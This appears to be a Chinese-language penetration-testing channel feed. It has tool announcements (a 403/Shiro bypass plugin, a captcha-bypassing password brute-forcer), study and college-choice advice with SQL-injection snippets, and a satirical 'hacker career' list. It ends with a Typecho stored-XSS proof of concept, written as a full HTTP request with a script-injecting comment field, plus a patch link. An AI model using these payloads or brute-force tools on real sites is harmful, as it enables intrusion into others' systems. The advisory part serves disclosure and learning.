显齋Oracle-网络安全/web渗透

对权限绕过自动化bypass的burpsuite插件，支持403bypass,shiro的签名绕过

聊到就业和学习顺便补一下工作证的图

关于如何入门学习渗透，巨多人在问这个事 能有条件在大学里系统学肯定是最好，科班注重数学基础和工科思维的培养，上限肯定是最高 这个路线比起一般培训班，小迪暗月这种，是我个人按大学体系排的，比较注重基础而不是上来就kali和工具 网上培训班也会给你讲一点原理，比如给你讲注入语句1' order by 1#对应的后端sql语句是SELECT first_name, last_name FROM users WHERE user_id = '1' order by 1#`，你光听这个好像原理也懂了简单嘛不就是多了个单引号吗，然后一个substr(database(),1,1)='q' and sleep(3)，我去这是啥。xss里复制粘贴payload实战各种过滤绕不过，甚至还有js基础没打好自己语句就写不闭合的，等等，都是网课受害者的典型类型 按着我给的这个思路学（前提是你认真学的话）花一年多到个红中水平应该是有可能的，不具有审计大型框架挖洞的能力但超出脚本小子也不少，实战里起码能自己按着实际情况加工一下exp，绕过一些老旧的安全产品 然后是找的第一部分的一些课程资源 【OSI七层模型最细节教程，一天学完各层模型及常见协议，停止低效学习！！！-哔哩哔哩】 https://b23.tv/Dzb63bSk 【五分钟理解：TCP/IP协议中网络包层层嵌套的涵义。必须要一层套一层吗，不可以干净利落一点直接传输吗？不可以！-哔哩哔哩】 https://b23.tv/DfA0vQP 通过百度网盘分享的文件：大规模路由技术 链接:https://pan.baidu.com/s/1sJDGYS5VCm4SJ6-n3-8eDg?pwd=b8em 提取码:b8em 复制这段内容打开「百度网盘APP 即可获取」 通过百度网盘分享的文件：网络安全基础 链接:https://pan.baidu.com/s/1auIwK6FDeVXWwJE2bMyGyg?pwd=3d28 提取码:3d28 复制这段内容打开「百度网盘APP 即可获取」 通过百度网盘分享的文件：Http协议基础 链接:https://pan.baidu.com/s/14LsuOH24rK8jNE1Wx5Qu-Q?pwd=ji9m 提取码:ji9m 复制这段内容打开「百度网盘APP 即可获取」

马上就要高考志愿填报了，频道里可能有想学网安专业的，作为当年被招考老师忽悠的受害者大概科普一下这个专业的填报经验 如果高考分数没上本科线就不要考虑网安或者计算机方向。整个互联网无论是开发还是安全这几年都卷得不行，长亭这种T3安全企业去年招聘的几个学历是一个南航一个华南理工加我一个电子科大，南航那个还是研究生，大专学网安不是当保安就是送外卖 网安不卷还贼有钱，放屁。这个是本专业招考老师忽悠人的经典话术。国内就业分为蓝队红队，蓝队确实不是特别忙但工资低，月薪三千的安服大有人在。你们看到的二三十K的岗位，渗透测试工程师，漏洞研究员，逆向工程师等都属于红队，卷得不比开发岗轻松，时刻关注最新的威胁情报和技术文章等，不到两年毛就掉完了 还有任何安全岗位，都存在负责问题。有人说安服小事不用管大事管不了，这个话很中肯，但企业不会管这个，花了钱养你有0day打过来你也得硬着头皮上。安服可以摸鱼吗？可，不出事也确实没哪个管你，一但倒霉丢工作算轻，像我这种手里几个gov的就只有等着进局子了 关于填报，纯外行会说学计算机，懂一点的会说信息安全或者网络空间安全，实际上不止。软件工程，网络工程，通信安全是网安里逆向，web等单个方向的专精，学完过后本领域的基础知识和某些拓展大概率比网安本专业的更强。计算机科学与技术是最大的专业，包括安全与开发。这四个专业学完过后考研转安全或是自己上一下网课就业是完全没问题的。很多大学没有给网安专门开设专业，电子信息类，计算机类，工科试验班这几个都可能会有网安方向 最顶的选择是本科选应用数学再考研网安 T0到T5的相关院校 清北浙 华科，哈工大，南大，北航 电子科大，川大，北邮，上交 北交，北理，中科大，同济，西电，西交 南开，东北大学，吉林大学，中南大学，西工大，人大，天津大学，大连理工，东南大学 北科，南航，杭州电子科技大学，合工大，厦大，华南理工，中山大学，重大 附： 1.虽然web渗透是大家最感兴趣的，但确实强烈不建议学这个方向，神仙太多了大家都在往这里面卷，今后前景好的应该是云安全，嵌入式，二进制等方向，工资高的也都得兼顾开发和安全能力 2.像华东师大这种虽然开了信安专业但是专业课程不是你们感兴趣的学校我就直接排了 3.还有几个军校，国防科技大学，解放军信息工程大，陆军工程大学，火箭军工程大学，想参军的也可以自行考虑，包括电子对抗技术这个专业被称作军校网安，我不很懂你们只有自行去了解

网站弱口令爆破小脚本，支持绕过图形验证码、绕过前端数据加密

第一章：沉淀 第二章：青春终于败给了资本，那场高考毁了我的本科梦 第三章：大专也是大学 第四章：专业网安，未来的黑客 第五章：专升本失败，直接就业少走几年弯路 第六章：距某ctfxx天，顶峰相见 第七章：比赛都是套路，专心实战 第八章：两天护网兵，一生国企情 月薪三千五，华亭也是亭 第九章：主管不是人，愤然辞职 第十章：黑客烧烤 第十一章：烧烤店倒闭，黑客维修 第十二章：行业不吃香，黑客代驾 第十三章：吊销驾驶证，碧桂园五星上将 第十四章：教训不只好歹的业主，欺负落单的外卖员，遇到危险全身而退 第十五章：资深java程序员在家待业 第十六章：入职🐎士兵 《暗网黑客渗透》《kali渗透聪入门到精通》《红客联盟内训》《一秒获取女神信息，黑客有多可怕》 第十七章：接触Telegram，黑客之神王者归来 第十八章：入侵美韩，横扫台湾，一声令下十万0day归来，北约闻风丧胆，博彩网站后台更不在话下，各种实时数据收钱拿站 第十九章：个户全户三网机主q反微反接码点号轰炸机，最后喜提反诈 大结局：西工大被美国攻击，若有召，战必回！ #黑客# #渗透# #匿名者# #网络安全# #APT# #Kali# #红客联盟# #北约# #技术纯享# #FBI# #暗网#

Typecho框架最近出现严重的xss存储型攻击漏洞，可直接getshell 描述 Typecho错误注释具有漏洞的URL，对任何具有xss有效载荷的文章进行评论，在Comments/usr/themes/default/comments.php中，只过滤开头没有任何其他保护，并直接回显到html，再次访问相同站点时可触发xss poc POST /index.php/archives/1/comment HTTP/1.1 Host: 127.0.0.1 Content-Length: 143 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://127.0.0.1/index.php/archives/1/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close author=123&mail=123%40123.com&url=http://xxx.xxx.com/"></a><script>alert("hack")</script><a/href="#&text=123&_=9d8302e080b9c139354b528787f1e5e4 补丁地址https://github.com/typecho/typecho/releases/tag/v1.2.1-rc

瑞友天翼sql webshell写入文件导致rce检测脚本